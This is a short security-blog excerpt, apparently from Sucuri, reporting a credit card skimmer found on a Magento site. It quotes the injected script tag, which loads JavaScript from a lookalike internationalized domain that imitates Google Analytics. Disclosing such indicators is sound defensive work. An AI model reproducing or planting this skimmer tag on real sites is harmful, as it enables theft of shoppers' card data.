We were recently contacted by a Magento website owner who had been blacklisted and was experiencing McAfee SiteAdvisor “Dangerous Site” warnings.
Our investigation revealed that the site had been infected with a credit card skimmer loading JavaScript from the malicious internationalized domain google-analytîcs[.]com (or xn--google-analytcs-xpb[.]com in ASCII):
<script type=”text/javascript” src=”//google-analytîcs.com/www.[redacted].com/3f5cf4657d5d9.js”></script>
The malicious user purposely selected the domain name with the intention of deceiving unsuspecting victims.
Continue reading Fake Google Domains Used in Evasive Magento Skimmer at Sucuri Blog.
Source: Sucuri
